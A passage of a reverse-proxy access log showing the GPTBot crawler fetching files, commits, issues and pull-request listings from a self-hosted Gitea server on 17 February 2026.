(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor_full.spec" [Client 74.7.227.38] [Length 708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 877] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" +[17/Feb/2026:17:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:17:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fOpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 21728] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:17:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fOpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 22029] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:17:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:17:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service?display=source" [Client 74.7.227.38] [Length 12604] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" +[17/Feb/2026:17:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19750] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" +[17/Feb/2026:17:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19747] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" +[17/Feb/2026:17:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19749] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" +[17/Feb/2026:17:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" +[17/Feb/2026:17:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" +[17/Feb/2026:17:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" +[17/Feb/2026:17:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15653] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15650] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:17:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:17:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:17:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17054] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10134] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:17:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17056] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15651] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9911] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:17:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 